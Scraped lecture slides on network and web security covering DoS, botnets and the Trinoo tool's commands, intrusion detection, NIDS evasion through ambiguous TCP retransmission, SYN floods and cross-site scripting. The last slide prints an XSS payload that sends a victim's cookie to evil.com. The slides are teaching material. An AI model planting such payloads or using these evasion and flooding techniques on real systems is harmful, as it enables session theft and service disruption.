20
Network & WebSecurity Dina Katabi [email protected] nms.csail.mit.edu/ ~dina

Network & WebSecurity Dina Katabi [email protected] nms.csail.mit.edu/~dina

Embed Size (px)

Citation preview

Page 1: Network & WebSecurity Dina Katabi dk@mit.edu nms.csail.mit.edu/~dina

Network & WebSecurity

Dina [email protected]/~dina

Page 2: Network & WebSecurity Dina Katabi dk@mit.edu nms.csail.mit.edu/~dina

Denial of Service Attack (DoS)

Goal: prevents legit access to an Internet service

Mechanism: Typically tries to congest the service or bring it down

Types: can target any resource, e.g., link bandwidth, routing system, access to database

Example: attacker transmits too many packets to congest the access link of the server causing legitimate connections to suffer excessive drops and timeout

Page 3: Network & WebSecurity Dina Katabi dk@mit.edu nms.csail.mit.edu/~dina

BotNets

A Botnet is a large collection of compromised machines controlled by an attacker

Botnets can be used to mount distributed DoS or DDoS

Machines in a botnet are compromised via Internet worms, viruses, Trojans, etc.

One can rent a Botnet of $10K machines for about $200/day

Page 4: Network & WebSecurity Dina Katabi dk@mit.edu nms.csail.mit.edu/~dina

A Botnet is typically organized in hierarchy

Master

Daemon

Victim

Unidirectional commands

Attack traffic

Coordinating communication

Attacker

Master Master

Daemon DaemonDaemonDaemon DaemonDaemonDaemonDaemonDaemon

Page 5: Network & WebSecurity Dina Katabi dk@mit.edu nms.csail.mit.edu/~dina

Specialized software is installed on the compromised machines, e.g., Trinoo

Connection to port (default 27665/tcp)

attacker$ telnet 10.0.0.1 27665Trying 10.0.0.1Connected to 10.0.0.1Escape character is '^]'.KwijiboConnection closed by foreign host. . . .

attacker$ telnet 10.0.0.1 27665Trying 10.0.0.1Connected to 10.0.0.1Escape character is '^]'.Betaalmostdonetrinoo v1.07d2+f3+c..[rpm8d/cb4Sx/]

trinoo>

Page 6: Network & WebSecurity Dina Katabi dk@mit.edu nms.csail.mit.edu/~dina

Trin00 Commands dos <IP> - command to initiate a DoS against the targeted <IP>

address

mdos <IP1:IP2:IP3> - sends command to attack three IP addresses, sequentially

die – shut down the master

mdie <password> - if correct password specified, packet is sent out to all daemon nodes to shutdown

mping – ping sent to all nodes in the deamon list

killdead – delete deamon nodes from list that didn’t reply to ping

bcast – gives a list of all active daemons

mstop – Attempts to stop an active DoS attack. Never implemented by the author(s), but the command is there

Page 7: Network & WebSecurity Dina Katabi dk@mit.edu nms.csail.mit.edu/~dina

Approaches to Intrusion Detection1. Signature Based: Keeps a DB of known attack signatures

and matches traffic against DB (e.g., Bro, Snort) Pros

Easy to understand the outcome More accurate in detecting known attacks

Cons Can’t discover new attacks

2. Anomaly Based: Matches traffic against a model of normal traffic and flags abnormalities (e.g., EMERALD)

Pros Can deal with new attacks

Cons Modeling normal. it is hard to describe what is normal Limits new applications Less accurate detection of known attacks

3. Hybrid: Matches against DB of known attacks. If no match, it checks for anomaly

Page 8: Network & WebSecurity Dina Katabi dk@mit.edu nms.csail.mit.edu/~dina

Evasion Problem in NIDS

Consider scanning traffic for a particular string (“USER root”)

Easiest: scan for the text in each packet No good: text might be split across multiple

packets Okay, remember text from previous packet

No good: out-of-order delivery Okay, fully reassemble byte stream

Costs state …. …. and still evadable

Source: Vern Paxson

Page 9: Network & WebSecurity Dina Katabi dk@mit.edu nms.csail.mit.edu/~dina

Evading Detection ViaAmbiguous TCP Retransmission

Sender Receiver

NIDS

15 hops20 hops

Page 10: Network & WebSecurity Dina Katabi dk@mit.edu nms.csail.mit.edu/~dina

Evading Detection ViaAmbiguous TCP Retransmission

Attacker Receiver

n

r r

NIDSn or r?

TTL=17, seq=1

TTL=23, seq=1Timed out

Page 11: Network & WebSecurity Dina Katabi dk@mit.edu nms.csail.mit.edu/~dina

Evading Detection ViaAmbiguous TCP Retransmission

Attacker Receiver

n

r r

NIDSn or r?i or o?

TTL=17, seq=1

TTL=23, seq=1

o

i

oTTL=21, seq=2

TTL=15, seq=2

Timed out

Timed out

Page 12: Network & WebSecurity Dina Katabi dk@mit.edu nms.csail.mit.edu/~dina

Evading Detection ViaAmbiguous TCP Retransmission

Attacker Receiver

n

r r

NIDSn or r?i or o?oc or t?

TTL=17, seq=1

TTL=23, seq=1

o

i

oTTL=21, seq=2

TTL=15, seq=2

Timed out

Timed out

o

c

oTTL=20, seq=3

TTL=19, seq=4 Timed out

t tTTL=27, seq=4

noot? niot? rooc? nooc?

nioc? riot? root? …

Page 13: Network & WebSecurity Dina Katabi dk@mit.edu nms.csail.mit.edu/~dina

TCP SYN Flood

TCP DoS Attacks:

Client Server

SYNC

SYNS, ACKC

ACKS

Listening

Store data

Wait

Connected

Page 14: Network & WebSecurity Dina Katabi dk@mit.edu nms.csail.mit.edu/~dina

TCP SYN Flood

TCP DoS Attacks:

C S

SYNC1 Listening

Store dataSYNC2

SYNC3

SYNC4

SYNC5

Page 15: Network & WebSecurity Dina Katabi dk@mit.edu nms.csail.mit.edu/~dina

TCP SYN Flood Usually targets connection memory Too

many half-open connections

Potential victim is any TCP-based server such as a Web server, FTP server, or mail server

How can the server deal with it? Server times out half-open connection

TCP DoS Attacks:

Page 16: Network & WebSecurity Dina Katabi dk@mit.edu nms.csail.mit.edu/~dina

DoS Attacks on Web Servers

Page 17: Network & WebSecurity Dina Katabi dk@mit.edu nms.csail.mit.edu/~dina

Attacks that Mimic Legitimate Traffic

Attacker compromises many machines causing them to flood victim with HTTP requests

Attacked resources DB and Disk bandwidth Socket buffers, processes, … Dynamic content, password checking, etc.

Hard to detect; attack traffic is indistinguishable from legitimate traffic

DoS Attacks on Servers:

GET LargeFile.zip

DO LongDBQuery

Page 18: Network & WebSecurity Dina Katabi dk@mit.edu nms.csail.mit.edu/~dina

CAPTCH-Based Solution

Suspected attack! To access www.foo.com enter the above letters:

Need to ensure: Cheap ways to send test and check answer Some people can’t or don’t want to answer graphical

tests but are legitimate users (e.g., Blind users)

Page 19: Network & WebSecurity Dina Katabi dk@mit.edu nms.csail.mit.edu/~dina

Web Attacks

Most web attacks exploit java scripts

Java scripts can appear in a web page as <script> executable instructions </script> The instructions between <script> instructions </script> do not appear on the web page; they get executed by the browser

If the instructions are malicious they can do a lot of harm to the client, e.g., steal web cookies

Cross-site scripting are one of the most common attack on web browsers

Page 20: Network & WebSecurity Dina Katabi dk@mit.edu nms.csail.mit.edu/~dina

Cross-Site Scripting (XSS) Say you have a trusted web server that accepts

entries from users, e.g.,TrustedBlog.com has a box for users to enter

comments on prior blogs

Attacker can embed an executable script in his comment like: <script> document.location = 'http://evil.com/blah.cgi?cookie=' + document.cookie; </script>

When a user browse the trusted server, the server sends the comments and the victim’s browser executes the script sending the victim’s cookie to the attacker’s site